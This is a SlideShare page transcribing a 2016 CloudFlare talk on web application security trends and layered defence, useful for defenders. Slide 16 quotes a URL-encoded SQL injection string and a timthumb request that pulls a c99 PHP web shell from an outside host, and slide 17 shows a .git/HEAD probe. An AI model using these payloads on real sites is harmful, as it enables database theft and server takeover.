Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Web Application Security
John Graham-Cumming |Chief Technology Officer, CloudFlare
March 2016
Agenda
• Layered Web Application Security
• 2015 Top Web Application Attack Techniques
• Kitchen Sink Attacks
• TLS
2
Introduction
Our mission
Help build a better Internet
4
Standards/PlatformAvailabilitySecurity Performance
Running applications on the Internet is challenging
5
“Hundreds of doll...
We solve the challenges of the Internet
6
• Analytics
• IPv6 gateway
• DNSSEC
• Google SPDY + HTTP2
• Apps platform
Standa...
7
Layered Web Application Security
What attackers attack
• Web applications themselves
• e.g. attempted SQL injection
• e.g. DoS by hitting CPU expensive URI...
Layered Defense
• Secure Coding Practices
• Web Application Firewall
• Can protect against application level attacks
• Use...
Buying Time
• A WAF buys time to patch vulnerabilities
• Common to see vulnerabilities announced along with patches
• But ...
Examples
• December 14, 2015 CVE-2015-8562
• Joomla CMS Unserialize Vulnerability
• Released without a patch
• April 25, 2...
2015 Top Web Application Attack Techniques
OWASP Top 10 in 2015
1. A5 Security Misconfiguration
2. A9 Using Components with Known
Vulnerabilities
3. A6 Sensitive Dat...
Common Web DoS Vectors
• Requests without a user agent
• Drop requests that have no User-Agent field
• WordPress pingback ...
Common Web DoS Vectors
• Faulty data sanitization
/skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%
201%2...
Common Web DoS Vectors
• Incorrect SCM data access
GET /.git/HEAD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; ...
Kitchen Sink Attacks
Everything they’ve got
• Common to see attackers try multiple vectors to bring down a web site
1. Simultaneous SYN flood, ...
Typical DoS volume at CloudFlare
20
Recent 400 Gbps DoS attacks
21
TLS
23
24
DROWN
March 1
2016
CloudFlare’s TLS Configuration
• Public and on Github
https://github.com/cloudflare/sslconfig
ssl_protocols TLSv1 TLSv1.1 ...
Conclusion
Conclusion
• Layered Defense
• Patch but use a WAF to buy time
• Stay on top of TLS
27
Upcoming SlideShare
Loading in …5
×

4

Share

Download to read offline

Latest Trends in Web Application Security

Download to read offline

Hear the talk on YouTube: https://www.youtube.com/watch?v=lp4dQTSH130

Web Application Firewall security is evolving. Join John Graham-Cumming, CTO of CloudFlare, as he shares the latest trends and changes in Web Application Security. This talk will give details of the big trends in web application security seen in 2015, and how to defend against these threats and talk about the evolving web application security landscape.

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

Latest Trends in Web Application Security

  1. 1. Web Application Security John Graham-Cumming |Chief Technology Officer, CloudFlare March 2016
  2. 2. Agenda • Layered Web Application Security • 2015 Top Web Application Attack Techniques • Kitchen Sink Attacks • TLS 2
  3. 3. Introduction
  4. 4. Our mission Help build a better Internet 4
  5. 5. Standards/PlatformAvailabilitySecurity Performance Running applications on the Internet is challenging 5 “Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.” “We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.” “The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.” “Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”
  6. 6. We solve the challenges of the Internet 6 • Analytics • IPv6 gateway • DNSSEC • Google SPDY + HTTP2 • Apps platform Standards/Platform • Load balancing • Always online • Redundant, Anycast network Availability • Reputation-based security • Distributed denial of service (DDoS) mitigation • Firewall • Secure socket layer (SSL) • Malware detection Security • Content delivery (CDN) • Authoritative DNS • Web content optimization (WCO) • Front-end / mobile optimization • Railgun™ WAN optimizer Performance
  7. 7. 7
  8. 8. Layered Web Application Security
  9. 9. What attackers attack • Web applications themselves • e.g. attempted SQL injection • e.g. DoS by hitting CPU expensive URI • Web servers • Attempted access to files on machines • SYN flooding to overwhelm TCP buffers • Related infrastructure • Authoratitive DNS for a domain / DNS poisoning • Domain registration 9
  10. 10. Layered Defense • Secure Coding Practices • Web Application Firewall • Can protect against application level attacks • Use one that can be customized for your application • DoS mitigation service • DNS service that has withstood large DoS attacks • DNSSEC • A domain registrar with robust security policies to prevent transfer 10
  11. 11. Buying Time • A WAF buys time to patch vulnerabilities • Common to see vulnerabilities announced along with patches • But how long does it take to patch 11
  12. 12. Examples • December 14, 2015 CVE-2015-8562 • Joomla CMS Unserialize Vulnerability • Released without a patch • April 25, 2015 SUPEE-5344 • Magento RCE Vulnerability • April 15, 2015 CVE-2015-1635 • Windows Server RCE Vulnerability 12
  13. 13. 2015 Top Web Application Attack Techniques
  14. 14. OWASP Top 10 in 2015 1. A5 Security Misconfiguration 2. A9 Using Components with Known Vulnerabilities 3. A6 Sensitive Data Exposure 4. A4 Insecure Direct Object References 5. A1 Injection 6. A3 XSS 7. A7 Missing Function Level Access Control 8. A8 Cross Site Request Forgery 9. A10 Unvalidated Redirects and Forwards 10. A2 Weak authentication and session management 14
  15. 15. Common Web DoS Vectors • Requests without a user agent • Drop requests that have no User-Agent field • WordPress pingback attacks • Drop WordPress pingbacks • Fake user agent • Validate User-Agent to identify real browsers 15
  16. 16. Common Web DoS Vectors • Faulty data sanitization /skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select% 201%20from%20(select%20 count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20us er%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema. tables%20group%20by%20x)a)%232. • Exploitation of timthumb for RCE GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php 16
  17. 17. Common Web DoS Vectors • Incorrect SCM data access GET /.git/HEAD HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 17
  18. 18. Kitchen Sink Attacks
  19. 19. Everything they’ve got • Common to see attackers try multiple vectors to bring down a web site 1. Simultaneous SYN flood, DNS reflection attack, and authoratitive DNS attack 2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time 3. 1 and 2 19
  20. 20. Typical DoS volume at CloudFlare 20
  21. 21. Recent 400 Gbps DoS attacks 21
  22. 22. TLS
  23. 23. 23
  24. 24. 24 DROWN March 1 2016
  25. 25. CloudFlare’s TLS Configuration • Public and on Github https://github.com/cloudflare/sslconfig ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20- draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:R SA+3DES:!MD5; ssl_prefer_server_ciphers on; 25
  26. 26. Conclusion
  27. 27. Conclusion • Layered Defense • Patch but use a WAF to buy time • Stay on top of TLS 27
  • samngms

    Sep. 17, 2017
  • ssusercd7a8a

    May. 20, 2017
  • meabed

    Apr. 28, 2017
  • appleangle

    Mar. 25, 2016

Hear the talk on YouTube: https://www.youtube.com/watch?v=lp4dQTSH130 Web Application Firewall security is evolving. Join John Graham-Cumming, CTO of CloudFlare, as he shares the latest trends and changes in Web Application Security. This talk will give details of the big trends in web application security seen in 2015, and how to defend against these threats and talk about the evolving web application security landscape.

Views

Total views

19,049

On Slideshare

0

From embeds

0

Number of embeds

35

Actions

Downloads

85

Shares

0

Comments

0

Likes

4

×